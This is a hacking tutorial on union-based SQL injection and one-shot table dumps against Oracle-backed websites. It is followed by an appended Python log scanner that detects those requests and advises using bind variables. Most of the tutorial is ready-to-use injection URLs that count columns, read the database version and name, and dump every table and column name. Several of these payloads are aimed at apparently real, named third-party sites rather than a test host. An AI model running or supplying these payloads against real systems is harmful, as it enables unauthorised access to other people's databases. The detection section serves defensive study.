Oracle SQL Injection and DIOS Query

In the Name of ALLAH the Most Beneficent and the Merciful

After getting a lot of requests to add DIOS and other database-related injection tutorials on Securityidiots, here we are with an Oracle-based SQL injection and DIOS tutorial.

The basics of Oracle union-based injection, which you can use to inject Oracle-based sites, are covered in the earlier tutorial "Union Based Oracle Injection".

I hope that after reading Union Based Oracle Injection you now know how to inject an Oracle-based site. In this tutorial we'll inject "http://demosite.com/page.php?id=1". Before we start, watch this basic video, which shows how to use some of the queries below; then read the tutorial, which explains them in more detail and gives some other examples of Oracle DIOS and injection. Let's see if the input below gives us an error.


http://demosite.com/page.php?id=1'
Now that we have the error, let's balance the query.

http://demosite.com/page.php?id=1' order by 1--
No Error
http://demosite.com/page.php?id=1' order by 8--
No Error
http://demosite.com/page.php?id=1' order by 9--
Error
Now we know 8 was the last column to work, so the query has 8 columns and we can try a union-based injection.

http://demosite.com/page.php?id=1'and 0=1 union select 111,222,333,444,555,666,777,888--
If you get an error, then try
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
and find the vulnerable column manually. If that doesn't work either, try this:
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
Hopefully one of the tricks above, or a mix of them, will work.
Let's assume the 3rd column is the vulnerable one, the one that gets printed on screen. We'll extract data through the third column, starting with the database version.

To get the version we use (select banner from v$version where rownum=1):
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(select banner from v$version where rownum=1),NULL,NULL,NULL,NULL,NULL--
Now let's get the current database using SYS.DATABASE_NAME.

http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL,NULL--
We will do the rest using DIOS (Dump In One Shot) for Oracle. Unlike in other databases, Oracle DIOS is simple: we just use the function wm_concat to extract data from the database.

http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(SELECT replace(wm_concat('<li>'||table_name),',','') FROM all_tables),NULL,NULL,NULL,NULL,NULL--
The above query will give you all tables. Now let's get the columns for a table, but that's not all, there's more you can do :D. As wm_concat is limited in output, we can't call it a complete DIOS, so yes, we'll soon work on some other versions of Oracle DIOS, but for now here are some other ways you can try.

http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 and 0=1 UNION+SELECT NULL,(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--' ,NULL,NULL from dual --&lang=it
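Seen from the server side, every request in this tutorial leaves a recognizable trace in the web access log. The following is an added example, not part of the original tutorial: a small log scanner that decodes each query string, matches the markers used above (ORDER BY probing, UNION SELECT, Oracle metadata views, wm_concat/LISTAGG) and flags clients that step through ORDER BY indexes. The log layout, rule names, threshold and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Markers taken from the requests shown in this tutorial.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "oracle_metadata": re.compile(r"v\$version|\ball_tables\b|\ball_tab_columns\b|sys\.database_name", re.I),
    "string_aggregation": re.compile(r"\b(?:wm_concat|listagg)\s*\(", re.I),
}
ORDER_BY_INDEX = re.compile(r"\border\s+by\s+(\d+)", re.I)
# Assumed log layout: client address first, request line in double quotes.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decoded_query(request_target):
    """Decode %XX and '+' so encoded and plain payloads look the same."""
    return unquote_plus(urlsplit(request_target).query)

def match_rules(request_target):
    """Return the names of the rules that match the decoded query string."""
    query = decoded_query(request_target)
    return {name for name, rx in RULES.items() if rx.search(query)}

def scan(log_lines, sweep_threshold=3):
    """Group hits per client; flag clients that step through ORDER BY indexes."""
    hits, indexes = defaultdict(set), defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed layout
        client, target = m.groups()
        hits[client] |= match_rules(target)
        indexes[client].update(ORDER_BY_INDEX.findall(decoded_query(target)))
    for client, seen in indexes.items():
        if len(seen) >= sweep_threshold:
            hits[client].add("column_count_sweep")
    return {client: sorted(names) for client, names in hits.items() if names}

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?id=1%27%20order%20by%201-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?id=1%27%20order%20by%208-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:07 +0000] "GET /page.php?id=1%27%20order%20by%209-- HTTP/1.1" 500 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /page.php?id=1%27and+0=1+union+select+NULL,NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 540',
    '198.51.100.20 - - [01/Jan/2024:10:00:11 +0000] "GET /search.php?q=union+rules+order+by+date HTTP/1.1" 200 300',
]
print(scan(SAMPLE_LOG))
```

Pattern matching of this kind is a detection aid only; the fix for the injectable id parameter is to pass it to Oracle as a bind variable instead of concatenating it into the statement.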
That's all for now, see you soon with our next tutorial :D